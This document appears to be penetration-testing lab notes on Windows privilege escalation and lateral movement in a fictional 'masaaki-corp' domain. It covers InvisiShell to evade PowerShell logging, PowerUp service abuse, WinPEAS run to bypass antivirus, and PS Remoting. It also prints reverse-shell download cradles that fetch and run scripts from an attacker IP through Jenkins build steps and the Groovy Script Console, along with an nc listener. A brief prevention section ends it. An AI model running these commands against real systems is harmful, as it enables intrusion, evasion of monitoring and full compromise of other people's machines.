1. Setup — Loading Tools Without Detection
Every command in this guide runs inside an InvisiShell session to bypass PowerShell logging. Never skip this step — running PowerUp or loading Mimikatz in a default PowerShell window generates events that will get you caught.
# Start InvisiShell (no admin required)
C:\AD\Tools> .\InvisiShell\RunWithRegistryNonAdmin.bat
# All subsequent commands run in this session
PS C:\AD\Tools>
2. PowerUp — Automated Misconfiguration Scanner
PowerUp is part of the PowerSploit framework and automates discovery of the most common privilege escalation vectors on Windows: writable service binaries, unquoted service paths, weak registry permissions, misconfigured scheduled tasks, and more. It is the first tool you run on any new machine.
# Load PowerUp into memory
PS C:\AD\Tools> . .\PowerUp.ps1
# Run all checks — outputs every finding with an AbuseFunction suggestion
PS C:\AD\Tools> Invoke-AllChecks
PowerUp checks for the following categories and outputs a AbuseFunction for each finding — a direct command you can run to exploit it:
Service paths with spaces and no quotes. Windows tries to execute files in each path segment — you plant a malicious binary in the highest-privilege writable directory.
Service executable that your user can overwrite. Replace it with a payload, restart the service, get SYSTEM.
You can change the service's binary path via sc config. Point it at your payload.
Registry keys for services that your user can write. Modify ImagePath to point to your binary.
Both HKLM and HKCU registry keys set to 1. Any MSI package installs as SYSTEM regardless of the user running it.
Directories in %PATH% that your user can write. A service loading a missing DLL from a writable path is hijackable.
3. Service Abuse — Unquoted Paths & Writable Binaries
Services are the most reliable local privilege escalation primitive on Windows. When a service runs as SYSTEM (the default for most third-party software) and its configuration is misconfigured, any user who can influence its execution path gets SYSTEM.
Scenario: PowerUp found a vulnerable service — MasaakiWebServer — running as SYSTEM with a modifiable binary path. Invoke-ServiceAbuse automates the exploitation: it modifies the service config to add your user to the local Administrators group, restarts the service, then restores the original config.
# Exploit the vulnerable service to add masaaki to local admins
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'MasaakiWebServer' -UserName 'masaaki-corp\masaaki' -Verbose
# Verify local admin membership (log off and on, or start a new token)
PS C:\AD\Tools> Get-LocalGroupMember -Group "Administrators"
# Or classic net command
C:\AD\Tools> net localgroup administrators
net localgroup administrators masaaki-corp\masaaki /add, the SYSTEM-level process adds your account to local admins when the service restarts. PowerUp handles the modification and restoration automatically.
If a service has a path like C:\Program Files\Masaaki App\service.exe (unquoted, with a space), Windows tries to execute these paths in order:
C:\Program.exeC:\Program Files\Masaaki.exeC:\Program Files\Masaaki App\service.exe(the real one)
If you can write to C:\Program Files\, you plant Masaaki.exe there and it runs as SYSTEM before the real binary.
# Find all unquoted service paths manually
PS C:\AD\Tools> Get-WmiObject Win32_Service | Where-Object {
$_.PathName -notmatch '"' -and $_.PathName -match ' '
} | select Name, PathName, StartMode
# Check if the exploitable directory is writable
PS C:\AD\Tools> Get-Acl "C:\Program Files\Masaaki App" | select -ExpandProperty Access
# Place payload, then restart the service
PS C:\AD\Tools> Restart-Service -Name MasaakiApp -Force
4. WinPEAS — Comprehensive Enumeration
WinPEAS (Windows Privilege Escalation Awesome Scripts) is a more exhaustive scanner than PowerUp. It checks everything — system info, installed software, scheduled tasks, network shares, stored credentials, token privileges, registry autoruns, and DPAPI master keys. It's noisier but leaves nothing unchecked.
# Run WinPEAS (obfuscated version to bypass AV)
C:\AD\Tools> .\winPEASx64.exe notcolor log
# The "log" flag saves output to a file — useful for reviewing findings offline
# "notcolor" removes ANSI codes if redirecting output
# Run only specific categories for speed
C:\AD\Tools> .\winPEASx64.exe systeminfo userinfo processinfo servicesinfo applicationsinfo windowscreds
# Run the .NET version if the exe is flagged
PS C:\AD\Tools> .\winPEASany.exe
SeImpersonatePrivilege, SeDebugPrivilege), stored credentials, and writable service paths.
High-Value WinPEAS Findings to Target
Any service account with this token privilege is vulnerable to Potato attacks (PrintSpoofer, GodPotato, JuicyPotato). Instant SYSTEM from IIS, SQL Server or Exchange service accounts.
Windows Credential Manager can store plaintext passwords. WinPEAS lists all saved credentials — these can be reused with runas /savecred without knowing the actual password.
Found in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Servers configured for automatic login store the password in plaintext in the registry.
Executables that run at system startup from writable directories. Replace the binary and wait for a reboot or trigger the autorun manually.
5. PrivEscCheck — Structured Audit
PrivEscCheck is a PowerShell script that performs a structured, report-style audit of privilege escalation vectors. Unlike WinPEAS it produces clean, categorised output that is easier to parse and include in reports.
# Load and run PrivEscCheck
PS C:\AD\Tools> . .\PrivEscCheck.ps1
PS C:\AD\Tools> Invoke-PrivescCheck
# Extended checks (includes more checks, takes longer)
PS C:\AD\Tools> Invoke-PrivescCheck -Extended
# Output as HTML report
PS C:\AD\Tools> Invoke-PrivescCheck -Report PrivEsc-Report -Format HTML
PrivEscCheck categorises findings into: Config (system misconfigs), Creds (stored credentials), Updates (missing patches), Services (service misconfigs), DLL Hijacking, and Scheduled Tasks.
6. Finding Machines Where You Already Have Local Admin
Before escalating privileges on your current machine, check whether you already have local admin access on other machines in the domain — perhaps from a group membership or a previous deployment. This saves you the escalation step entirely on those targets.
# Load the script
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
# Scan all domain computers — outputs machines where masaaki has local admin
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
# Example output:
masaaki-adminsrv
masaaki-dev01
# This means masaaki has local admin on masaaki-adminsrv and masaaki-dev01
# No privilege escalation needed on those machines — jump straight there
7. Lateral Movement via PS Remoting & WinRS
Once you have local admin on a remote machine, use WinRS or PS Remoting to get a shell on it. These are legitimate Windows remote management protocols — much less suspicious than spawning reverse shells.
# WinRS — interactive CMD session on the remote machine
C:\AD\Tools> winrs -r:masaaki-adminsrv cmd
# PowerShell Remoting — PS session
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-adminsrv.masaaki-corp.local
# Confirm you're on the remote machine and who you are
PS [masaaki-adminsrv.masaaki-corp.local]: C:\Users\masaaki\Documents> $env:username
masaaki-corp\masaaki
# Run a command on a remote machine without entering a session
PS C:\AD\Tools> Invoke-Command -ComputerName masaaki-adminsrv -ScriptBlock { whoami; hostname }
# Run a script on a remote machine (load tools remotely)
PS C:\AD\Tools> Invoke-Command -ComputerName masaaki-adminsrv -FilePath .\PowerView.ps1
8. Exploiting Jenkins for Domain Admin
Jenkins is a CI/CD platform that allows authenticated users to define build jobs with custom build steps — including arbitrary OS commands. A Jenkins instance where any domain user can configure builds is effectively a remote code execution server running under a privileged service account.
Scenario: Jenkins is running on masaaki-ci:8080. You have access (via a found credential or unauthenticated access) to configure a build job. You add a Windows batch command step to get a reverse shell back to your attacking machine.
- Navigate to the Jenkins dashboard and create or edit a build job.
- Under Build Steps, add a Execute Windows batch command step.
- Enter a PowerShell download-cradle to pull and execute a reverse shell:
powershell.exe iex (iwr http://192.168.100.55/Invoke-PowerShellTcp.ps1 -UseBasicParsing) - On your attacking machine, host the reverse shell script and start a listener:
# Host the script python3 -m http.server 80 # Listen for the callback (use nc or powercat) nc -lvnp 443 - Trigger the build. The Jenkins service account executes your code.
If you have admin access to Jenkins, the Script Console (/script) runs arbitrary Groovy code directly in the Jenkins JVM process. This is the most direct path to code execution.
# Navigate to: http://masaaki-ci:8080/script
# Run system commands via Groovy:
def cmd = "whoami"
def proc = cmd.execute()
proc.waitFor()
println proc.text
# Full reverse shell via Groovy
def cmd2 = ['powershell.exe', '-c', 'iex (iwr http://192.168.100.55/shell.ps1 -UseBasicParsing)']
cmd2.execute()
9. Prevention & Detection
Run PowerUp in audit mode quarterly. Unquoted service paths and writable service binaries are easy to fix — quote the paths, restrict write permissions — but rarely get attention during deployments.
Services should run as dedicated low-privilege service accounts, never as SYSTEM or Domain Admin. Use managed service accounts (MSA / gMSA) where possible — their passwords rotate automatically.
Require authentication for all Jenkins access. Disable the Script Console for non-admin users. Never run Jenkins as a Domain Admin service account — create a dedicated, minimally privileged account.
Alert on SeImpersonatePrivilege and SeDebugPrivilege usage by non-service accounts. These events appear in the Security event log (4672 — Special Logon).
Constrained Language Mode prevents PowerShell from loading arbitrary .NET types and executing advanced scripts. Combined with WDAC (Windows Defender Application Control), it significantly raises the cost of PowerUp and similar tools.
Audit stored credentials on all machines (cmdkey /list). Remove any stored domain credentials. Attackers with local admin can extract these from DPAPI without needing the user's password.